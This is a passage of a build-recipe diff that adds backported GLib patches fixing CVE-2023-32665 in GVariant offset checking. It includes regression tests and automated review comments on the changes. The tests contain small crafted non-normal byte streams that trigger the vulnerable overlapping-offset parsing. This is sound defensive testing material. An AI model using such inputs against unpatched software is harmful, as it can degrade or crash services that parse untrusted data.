92+ * have been checked, check the remaining offsets to see whether they’re
93+ * normal (in order, no overlapping tuple elements).
94+ *
95+ * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
96+ * all the tuple *elements* here, not just all the framing offsets, since
97+ * tuples contain a mix of elements which use framing offsets and ones which
98+ * don’t. None of them are allowed to overlap. */
99+ if (index_ > value.ordered_offsets_up_to)
100+ {
101+ gsize i, prev_i_end = 0;
102+
103+ if (value.ordered_offsets_up_to > 0)
104+ gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
105+
106+ for (i = value.ordered_offsets_up_to; i <= index_; i++)
107+ {
108+ gsize i_start, i_end;
109+
110+ gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
111+
112+ if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
113+ break;
114+
115+ prev_i_end = i_end;
116+ }
117+
118+ value.ordered_offsets_up_to = i - 1;
119+ }
120+
121+ if (index_ > value.ordered_offsets_up_to)
122+ {
123+ /* Offsets are invalid somewhere, so return an empty child. */
124+ return child;
125+ }
126+
127 if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
128 {
129 if (offset_size * (member_info->i + 2) > value.size)
130diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
131index 99d18ef..144aec8 100644
132--- a/glib/gvariant-serialiser.h
133+++ b/glib/gvariant-serialiser.h
134@@ -34,8 +34,11 @@ typedef struct
135 * This guarantees that the bytes of element n don't overlap with any previous
136 * element.
137 *
138- * This is both read and set by g_variant_serialised_get_child for arrays of
139- * non-fixed-width types */
140+ * This is both read and set by g_variant_serialised_get_child() for arrays of
141+ * non-fixed-width types, and for tuples.
142+ *
143+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
144+ * rather than an index into the frame offsets. */
145 gsize ordered_offsets_up_to;
146 } GVariantSerialised;
147
148diff --git a/glib/gvariant.c b/glib/gvariant.c
149index d6f68a9..cdb428e 100644
150--- a/glib/gvariant.c
151+++ b/glib/gvariant.c
152@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
153 serialised.type_info = g_variant_get_type_info (trusted);
154 serialised.size = g_variant_get_size (trusted);
155 serialised.data = g_malloc (serialised.size);
156+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
157 g_variant_store (trusted, serialised.data);
158 g_variant_unref (trusted);
159
160diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
161index 967e9a1..a84b02e 100644
162--- a/glib/tests/gvariant.c
163+++ b/glib/tests/gvariant.c
164@@ -1,6 +1,7 @@
165 /*
166 * Copyright © 2010 Codethink Limited
167 * Copyright © 2020 William Manley
168+ * Copyright © 2022 Endless OS Foundation, LLC
169 *
170 * This library is free software; you can redistribute it and/or
171 * modify it under the terms of the GNU Lesser General Public
172@@ -1451,6 +1452,7 @@ test_maybe (void)
173 serialised.data = flavoured_malloc (needed_size, flavour);
174 serialised.size = needed_size;
175 serialised.depth = 0;
176+ serialised.ordered_offsets_up_to = 0;
177
178 g_variant_serialiser_serialise (serialised,
179 random_instance_filler,
180@@ -1574,6 +1576,7 @@ test_array (void)
181 serialised.data = flavoured_malloc (needed_size, flavour);
182 serialised.size = needed_size;
183 serialised.depth = 0;
184+ serialised.ordered_offsets_up_to = 0;
185
186 g_variant_serialiser_serialise (serialised, random_instance_filler,
187 (gpointer *) instances, n_children);
188@@ -1738,6 +1741,7 @@ test_tuple (void)
189 serialised.data = flavoured_malloc (needed_size, flavour);
190 serialised.size = needed_size;
191 serialised.depth = 0;
192+ serialised.ordered_offsets_up_to = 0;
193
194 g_variant_serialiser_serialise (serialised, random_instance_filler,
195 (gpointer *) instances, n_children);
196@@ -1834,6 +1838,7 @@ test_variant (void)
197 serialised.data = flavoured_malloc (needed_size, flavour);
198 serialised.size = needed_size;
199 serialised.depth = 0;
200+ serialised.ordered_offsets_up_to = 0;
201
202 g_variant_serialiser_serialise (serialised, random_instance_filler,
203 (gpointer *) &instance, 1);
204@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
205 g_variant_unref (variant);
206 }
207
208+/* This is a regression test that we can't have non-normal values that take up
209+ * significantly more space than the normal equivalent, by specifying the
210+ * offset table entries so that tuple elements overlap.
211+ *
212+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
213+ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
214+static void
215+test_normal_checking_tuple_offsets2 (void)
216+{
217+ const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
218+ const guint8 data[] = {
219+ 0x12, 0x34, 0x56, 0x78, 0x01,
220+ /*
221+ ^───────────────────┘
222+
223+ ^^^^^^^^^^ 1st yy
224+ ^^^^^^^^^^ 2nd yy
225+ ^^^^^^^^^^ 3rd yy
226+ ^^^^ Framing offsets
227+ */
228+
229+ /* If this variant was encoded normally, it would be something like this:
230+ * 0x12, 0x34, pad, pad, [array bytes], 0x56, 0x78, pad, pad, [array bytes], 0x9A, 0xBC, 0xXX
231+ * ^─────────────────────────────────────────────────────┘
232+ *
233+ * ^^^^^^^^^^ 1st yy
234+ * ^^^^^^^^^^ 2nd yy
235+ * ^^^^^^^^^^ 3rd yy
236+ * ^^^^ Framing offsets
237+ */
238+ };
239+ gsize size = sizeof (data);
240+ GVariant *variant = NULL;
241+ GVariant *normal_variant = NULL;
242+ GVariant *expected = NULL;
243+
244+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
245+ g_assert_nonnull (variant);
246+
247+ normal_variant = g_variant_get_normal_form (variant);
248+ g_assert_nonnull (normal_variant);
249+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
250+
251+ expected = g_variant_new_parsed (
252+ "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
253+ g_assert_cmpvariant (expected, variant);
254+ g_assert_cmpvariant (expected, normal_variant);
255+
256+ g_variant_unref (expected);
257+ g_variant_unref (normal_variant);
258+ g_variant_unref (variant);
259+}
260+
261+/* This is a regression test that overlapping entries in the offset table are
262+ * decoded consistently, even though they’re non-normal.
263+ *
264+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
265+static void
266+test_normal_checking_tuple_offsets3 (void)
267+{
268+ /* The expected decoding of this non-normal byte stream is complex. See
269+ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
270+ * specification.
271+ *
272+ * The rule “Child Values Overlapping Framing Offsets” from the specification
273+ * says that the first `ay` must be decoded as `[0x01]` even though it
274+ * overlaps the first byte of the offset table. However, since commit
275+ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
276+ * this as it’s exploitable. So the first `ay` must be given a default value.
277+ *
278+ * The second and third `ay`s must be given default values because of rule
279+ * “End Boundary Precedes Start Boundary”.
280+ *
281+ * The `i` must be given a default value because of rule “Start or End
282+ * Boundary of a Child Falls Outside the Container”.
283+ */
284+ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
285+ const guint8 data[] = {
286+ 0x01, 0x00, 0x02,
287+ /*
288+ ^──┘
289+
290+ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
291+ 2nd ay, bytes 2-0
292+ i, bytes 0-4
293+ 3rd ay, bytes 4-1
294+ ^^^^^^^^^^ Framing offsets
295+ */
296+ };
297+ gsize size = sizeof (data);
298+ GVariant *variant = NULL;
299+ GVariant *normal_variant = NULL;
300+ GVariant *expected = NULL;
301+
302+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
303+ g_assert_nonnull (variant);
304+
305+ g_assert_false (g_variant_is_normal_form (variant));
306+
307+ normal_variant = g_variant_get_normal_form (variant);
308+ g_assert_nonnull (normal_variant);
309+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
310+
311+ expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
312+ g_assert_cmpvariant (expected, variant);
313+ g_assert_cmpvariant (expected, normal_variant);
314+
315+ g_variant_unref (expected);
316+ g_variant_unref (normal_variant);
317+ g_variant_unref (variant);
318+}
319+
320+/* This is a regression test that overlapping entries in the offset table are
321+ * decoded consistently, even though they’re non-normal.
322+ *
323+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
324+static void
325+test_normal_checking_tuple_offsets4 (void)
326+{
327+ /* The expected decoding of this non-normal byte stream is complex. See
328+ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
329+ * specification.
330+ *
331+ * The rule “Child Values Overlapping Framing Offsets” from the specification
332+ * says that the first `ay` must be decoded as `[0x01]` even though it
333+ * overlaps the first byte of the offset table. However, since commit
334+ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
335+ * this as it’s exploitable. So the first `ay` must be given a default value.
336+ *
337+ * The second `ay` must be given a default value because of rule “End Boundary
338+ * Precedes Start Boundary”.
339+ *
340+ * The third `ay` must be given a default value because its framing offsets
341+ * overlap that of the first `ay`.
342+ */
343+ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
344+ const guint8 data[] = {
345+ 0x01, 0x00, 0x02,
346+ /*
347+ ^──┘
348+
349+ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
350+ 2nd ay, bytes 2-0
351+ 3rd ay, bytes 0-1
352+ ^^^^^^^^^^ Framing offsets
353+ */
354+ };
355+ gsize size = sizeof (data);
356+ GVariant *variant = NULL;
357+ GVariant *normal_variant = NULL;
358+ GVariant *expected = NULL;
359+
360+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
361+ g_assert_nonnull (variant);
362+
363+ g_assert_false (g_variant_is_normal_form (variant));
364+
365+ normal_variant = g_variant_get_normal_form (variant);
366+ g_assert_nonnull (normal_variant);
367+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
368+
369+ expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
370+ g_assert_cmpvariant (expected, variant);
371+ g_assert_cmpvariant (expected, normal_variant);
372+
373+ g_variant_unref (expected);
374+ g_variant_unref (normal_variant);
375+ g_variant_unref (variant);
376+}
377+
378 /* Test that an empty object path is normalised successfully to the base object
379 * path, ‘/’. */
380 static void
381@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
382 test_normal_checking_array_offsets2);
383 g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
384 test_normal_checking_tuple_offsets);
385+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
386+ test_normal_checking_tuple_offsets2);
387+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
388+ test_normal_checking_tuple_offsets3);
389+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
390+ test_normal_checking_tuple_offsets4);
391 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
392 test_normal_checking_empty_object_path);
393
394--
3952.24.4
396
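--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
+From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 03:42:47 +0000
+Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
+ directly
+
+This is equivalent to what `GVariantIter` does, but it means that
+`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
+calls.
+
+This will be useful in an upcoming commit, where those child values will
+be inspected a little more deeply.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 7 +++----
+ 1 file changed, 3 insertions(+), 4 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index cdb428e..fdd36be 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
+ case G_VARIANT_CLASS_VARIANT:
+ {
+ GVariantBuilder builder;
+- GVariantIter iter;
+- GVariant *child;
++ gsize i, n_children;
+
+ g_variant_builder_init (&builder, g_variant_get_type (value));
+- g_variant_iter_init (&iter, value);
+
+- while ((child = g_variant_iter_next_value (&iter)))
++ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
++ GVariant *child = g_variant_get_child_value (value, i);
+ g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
+ g_variant_unref (child);
+ }
+--
+2.24.4
+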
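Review bot: The index-based loop that replaces `GVariantIter` in g_variant_deep_copy() carries no comment saying why, so a later cleanup could reasonably turn it back into an iterator. The patch description says the explicit `g_variant_get_child_value()` call exists so that follow-up commits can inspect each child. A short comment above the `for` would record that, e.g. `/* Index the children directly rather than via GVariantIter, so each child can be inspected before it is copied. */`. The body of g_variant_deep_copy() starts and ends outside this hunk.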
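--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
+From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:30:38 +0000
+Subject: [PATCH] gvariant: Track checked and ordered offsets independently
+
+The past few commits introduced the concept of known-good offsets in the
+offset table (which is used for variable-width arrays and tuples).
+Good offsets are ones which are non-overlapping with all the previous
+offsets in the table.
+
+If a bad offset is encountered when indexing into the array or tuple,
+the cached known-good offset index will not be increased. In this way,
+all child variants at and beyond the first bad offset can be returned as
+default values rather than dereferencing potentially invalid data.
+
+In this case, there was no information about the fact that the indexes
+between the highest known-good index and the requested one had been
+checked already. That could lead to a pathological case where an offset
+table with an invalid first offset is repeatedly checked in full when
+trying to access higher-indexed children.
+
+Avoid that by storing the index of the highest checked offset in the
+table, as well as the index of the highest good/ordered offset.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 28 ++++++++++++++++++++++++
+ glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
+ glib/gvariant-serialiser.h | 9 ++++++++
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 5 +++++
+ 5 files changed, 75 insertions(+), 12 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index b951cd9..1b9d5cc 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -67,6 +67,7 @@ struct _GVariant
+ GBytes *bytes;
+ gconstpointer data;
+ gsize ordered_offsets_up_to;
++ gsize checked_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -182,6 +183,24 @@ struct _GVariant
+ * This field is only relevant for arrays of non
+ * fixed width types and for tuples.
+ *
++ * .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
++ * the index of the highest element, n, whose frame
++ * offsets (and all the preceding frame offsets)
++ * have been checked for validity.
++ *
++ * It is always the case that
++ * .checked_offsets_up_to ≥ .ordered_offsets_up_to.
++ *
++ * If .checked_offsets_up_to == .ordered_offsets_up_to,
++ * then a bad offset has not been found so far.
++ *
++ * If .checked_offsets_up_to > .ordered_offsets_up_to,
++ * then a bad offset has been found at
++ * (.ordered_offsets_up_to + 1).
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types and for tuples.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
+ value->size,
+ value->depth,
+ value->contents.serialised.ordered_offsets_up_to,
++ value->contents.serialised.checked_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
+ serialised.data = data;
+ serialised.depth = value->depth;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ if (value->state & STATE_SERIALISED)
+ {
+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
+ }
+ else
+ {
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+ }
+
+ if (serialised->data)
+@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
++ value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ }
+
+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
+
+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++ value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
+
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index cd4a3e6..0bf7243 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -120,6 +120,8 @@
+ *
+ * @depth has no restrictions; the depth of a top-level serialised #GVariant is
+ * zero, and it increases for each level of nested child.
++ *
++ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
+ */
+
+ /* < private >
+@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
+ !(serialised.size == 0 || serialised.data != NULL))
+ return FALSE;
+
++ if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
++ return FALSE;
++
+ /* Depending on the native alignment requirements of the machine, the
+ * compiler will insert either 3 or 7 padding bytes after the char.
+ * This will result in the sizeof() the struct being 12 or 16.
+@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.size--;
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+
+ /* If the requested @index_ is beyond the set of indices whose framing offsets
+ * have been checked, check the remaining offsets to see whether they’re
+- * normal (in order, no overlapping array elements). */
+- if (index_ > value.ordered_offsets_up_to)
++ * normal (in order, no overlapping array elements).
++ *
++ * Don’t bother checking if the highest known-good offset is lower than the
++ * highest checked offset, as that means there’s an invalid element at that
++ * index, so there’s no need to check further. */
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ switch (offsets.offset_size)
+ {
+ case 1:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint8 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 2:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint16 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 4:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint32 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 8:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint64 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ default:
+ /* gvs_get_offset_size() only returns maximum 8 */
+ g_assert_not_reached ();
+ }
++
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ /* All offsets have now been checked. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ return TRUE;
+ }
+@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
+ * all the tuple *elements* here, not just all the framing offsets, since
+ * tuples contain a mix of elements which use framing offsets and ones which
+ * don’t. None of them are allowed to overlap. */
+- if (index_ > value.ordered_offsets_up_to)
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ gsize i, prev_i_end = 0;
+
+- if (value.ordered_offsets_up_to > 0)
+- gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++ if (value.checked_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
+
+- for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ for (i = value.checked_offsets_up_to; i <= index_; i++)
+ {
+ gsize i_start, i_end;
+
+@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+
+ value.ordered_offsets_up_to = i - 1;
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+
+ /* All element bounds have been checked above. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ {
+ gsize fixed_size;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 144aec8..e132451 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -40,6 +40,15 @@ typedef struct
+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
+ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
++
++ /* Similar to @ordered_offsets_up_to. This gives the index of the child element
++ * whose frame offset is the highest in the offset table which has been
++ * checked so far.
++ *
++ * This is always ≥ @ordered_offsets_up_to. It is always an element index.
++ *
++ * See documentation in gvariant-core.c for `struct GVariant` for details. */
++ gsize checked_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index fdd36be..f910bd4 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
++ serialised.checked_offsets_up_to = G_MAXSIZE;
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index a84b02e..640f3c0 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
+
+ serialised->depth = 0;
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -1453,6 +1454,7 @@ test_maybe (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1577,6 +1579,7 @@ test_array (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1742,6 +1745,7 @@ test_tuple (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1839,6 +1843,7 @@ test_variant (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+--
+2.24.4
+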
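Review bot: In the gvs_tuple_get_child() hunks, `value.ordered_offsets_up_to = i - 1;` would wrap to G_MAXSIZE if the loop exits on its first pass with `i == 0`. That looks reachable because the loop now starts at `value.checked_offsets_up_to`, which is initialised to 0 for untrusted data, but the loop's break condition is outside the hunk, so it needs confirming against the full function. If element 0 can fail the bounds test, the value would also violate the invariant this patch adds, because `checked_offsets_up_to` is set to `index_` on the next line and g_variant_serialised_check() now returns FALSE when `ordered_offsets_up_to > checked_offsets_up_to`. Either clamp it, for instance `value.ordered_offsets_up_to = (i > 0) ? i - 1 : 0;`, or add a comment stating why the first iteration cannot break.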
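--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
+From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:39:01 +0000
+Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
+
+The following few commits will add a couple of new fields to
+`GVariantSerialised`, and they should be zero-filled by default.
+
+Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
+default in a few places.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 2 +-
+ glib/tests/gvariant.c | 12 ++++++------
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index f910bd4..8ba701e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
+ if (alignment)
+ /* (potentially) contains multi-byte numeric data */
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariant *trusted;
+ GBytes *bytes;
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
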